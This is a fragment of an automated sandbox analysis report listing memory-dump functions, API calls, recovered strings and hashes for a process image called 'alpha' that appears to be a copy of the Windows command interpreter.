                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                    • String ID:
                                                                    • API String ID: 497088868-0
                                                                    • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                    • Instruction ID: ff41d2acc0a490e9f029f5f6f04b095c7435c9a306d1adb5e36a30f619bca0f0
                                                                    • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                    • Instruction Fuzzy Hash: C1319920A0CE8246FA24FF11A45157DE272AF89BA8FC45035E94E47B95DE3CE50B8730
                                                                    APIs
                                                                    • FindClose.KERNELBASE(?,?,?,00007FF71968EAC5,?,?,?,00007FF71968E925,?,?,?,?,00007FF71966B9B1), ref: 00007FF719673A56
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CloseFind
                                                                    • String ID:
                                                                    • API String ID: 1863332320-0
                                                                    • Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                    • Instruction ID: 3d62a2afee5a727fa6453e43365c509d759eacee23e92dedb821f5ac48eee02c
                                                                    • Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                    • Instruction Fuzzy Hash: 9401D220E08E83D6E658AF15B552439E6B2EF88BA8BD09031D50D82294DF2DF48B8330
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Concurrency::cancel_current_taskmalloc
                                                                    • String ID:
                                                                    • API String ID: 1412018758-0
                                                                    • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                    • Instruction ID: 4b142105635fed63539980decaba9c2fabf23e6b5e929feb2084b91b4f855fc5
                                                                    • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                    • Instruction Fuzzy Hash: B6E06D60F0AE0785FE1C3F62684107892A25F18778E882430DD1D05382EE2CE09B8330
                                                                    APIs
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966B9A1,?,?,?,?,00007FF71966D81A), ref: 00007FF71966CDA6
                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966B9A1,?,?,?,?,00007FF71966D81A), ref: 00007FF71966CDBD
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcess
                                                                    • String ID:
                                                                    • API String ID: 1617791916-0
                                                                    • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                    • Instruction ID: 5e44d6d3038dfe1fbd5a839f36602276bd9fb1aeb12c33797fd728c707414a77
                                                                    • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                    • Instruction Fuzzy Hash: CDF01932E18B4286EA04AF15F84047CFBB6FB89B65B989435D90E07758DF3CE44AC630
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: exit
                                                                    • String ID:
                                                                    • API String ID: 2483651598-0
                                                                    • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                    • Instruction ID: 4b6c9a8579aa24d756733333b5c98f70351e1be5f87670f1ea03cabd36bc8ba0
                                                                    • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                    • Instruction Fuzzy Hash: AEC01230704A4687EB1C7F31255503995775B18615F446438C50785281DD28D40D8230
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: DefaultUser
                                                                    • String ID:
                                                                    • API String ID: 3358694519-0
                                                                    • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                    • Instruction ID: ecd72b29f61774c8bfa4e1ad9b08bb5219d7abe90f0ebbae1c0ce36ef8217016
                                                                    • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                    • Instruction Fuzzy Hash: B3E0C2A2D09AD38AF55C3E5160413B4A973CB687AAFC440B1CA0D012C0492DA85B5238
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID:
                                                                    • API String ID: 2221118986-0
                                                                    • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                    • Instruction ID: 5cab4f76c4546067514733ca3050df108cf9eface288ff8be212cd36fec7421d
                                                                    • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                    • Instruction Fuzzy Hash: 21F0E921B09B8140FB449F56B54012992A29F48BF4F888335EF7C47BC9DE3CD4538720
                                                                    APIs
                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF719687F44
                                                                    • _get_osfhandle.MSVCRT ref: 00007FF719687F5C
                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF719687F9E
                                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF719687FFF
                                                                    • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF719688020
                                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF719688036
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF719688061
                                                                    • RtlFreeHeap.NTDLL ref: 00007FF719688075
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7196880D6
                                                                    • RtlFreeHeap.NTDLL ref: 00007FF7196880EA
                                                                    • _wcsnicmp.MSVCRT ref: 00007FF719688177
                                                                    • _wcsnicmp.MSVCRT ref: 00007FF71968819A
                                                                    • _wcsnicmp.MSVCRT ref: 00007FF7196881BD
                                                                    • _wcsnicmp.MSVCRT ref: 00007FF7196881DC
                                                                    • _wcsnicmp.MSVCRT ref: 00007FF7196881FB
                                                                    • _wcsnicmp.MSVCRT ref: 00007FF71968821A
                                                                    • _wcsnicmp.MSVCRT ref: 00007FF719688239
                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF719688291
                                                                    • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7196882D7
                                                                    • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7196882FB
                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF71968831A
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF719688364
                                                                    • RtlFreeHeap.NTDLL ref: 00007FF719688378
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF71968839A
                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7196883AE
                                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7196883E6
                                                                    • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF719688403
                                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF719688418
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                    • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                    • API String ID: 3637805771-3100821235
                                                                    • Opcode ID: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                    • Instruction ID: 490d761c2b3d716a2c6db4a535d0a67ba9272d952538e5dbb009e22b9996fe4d
                                                                    • Opcode Fuzzy Hash: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                    • Instruction Fuzzy Hash: 52E18031A08F52CAE710AF65A400579FAB2FB49BA9B849275CD1E53794DF3CA40EC730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                                    • String ID: DPATH
                                                                    • API String ID: 95024817-2010427443
                                                                    • Opcode ID: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                                    • Instruction ID: e505f936044834705a755fb3214613dcd5157ecde0e5765606ab42202efa605d
                                                                    • Opcode Fuzzy Hash: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                                    • Instruction Fuzzy Hash: 74128431A08B82CAE764AF159440579F7B2FB89B68F845139DA4E47794DF3CD40AC730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                                                    • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                    • API String ID: 1795611712-3662956551
                                                                    • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                    • Instruction ID: 56c6c9633fc6711d57d8d3eac0c883fa4ef00964ecf06d69c15e350fb7c37ba7
                                                                    • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                    • Instruction Fuzzy Hash: 21E19F61A08E42D6EB10AF65A8515B9E6B3FF44BACFC44136D90E47695EF3CE50E8330
                                                                    APIs
                                                                    • _wcsupr.MSVCRT ref: 00007FF71968EF33
                                                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968EF98
                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968EFA9
                                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968EFBF
                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF71968EFDC
                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968EFED
                                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968F003
                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968F022
                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968F083
                                                                    • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968F092
                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968F0A5
                                                                    • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF71968F0DB
                                                                    • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968F135
                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968F16C
                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF71968E964), ref: 00007FF71968F185
                                                                      • Part of subcall function 00007FF7196701B8: _get_osfhandle.MSVCRT ref: 00007FF7196701C4
                                                                      • Part of subcall function 00007FF7196701B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF71967E904,?,?,?,?,00000000,00007FF719673491,?,?,?,00007FF719684420), ref: 00007FF7196701D6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                    • String ID: <noalias>$CMD.EXE
                                                                    • API String ID: 1161012917-1690691951
                                                                    • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                    • Instruction ID: 40e386e2fd88e3baaea8b08d2158d9b9d06e6b14d1fdd7989299d8ad0b689e0d
                                                                    • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                    • Instruction Fuzzy Hash: 90917221A08F52CAFB15BF60E8111BDE6B2AF49B6CB845135DA0E56695DF3CA44E8330
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$BufferConsoleInfoScreen
                                                                    • String ID:
                                                                    • API String ID: 1034426908-0
                                                                    • Opcode ID: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                                    • Instruction ID: ac143f91373b63a338a60c1cfe7c3372f5c0a21805e5959649cdf2673d4f011a
                                                                    • Opcode Fuzzy Hash: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                                    • Instruction Fuzzy Hash: E2F1A332A08F828AEB24EF21D8512E9A7B6FF4576CF804135DA4D47695DF3CE54AC720
                                                                    APIs
                                                                    • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF71968AA85
                                                                    • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF71968AACF
                                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF71968AAEC
                                                                    • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7196898C0), ref: 00007FF71968AB39
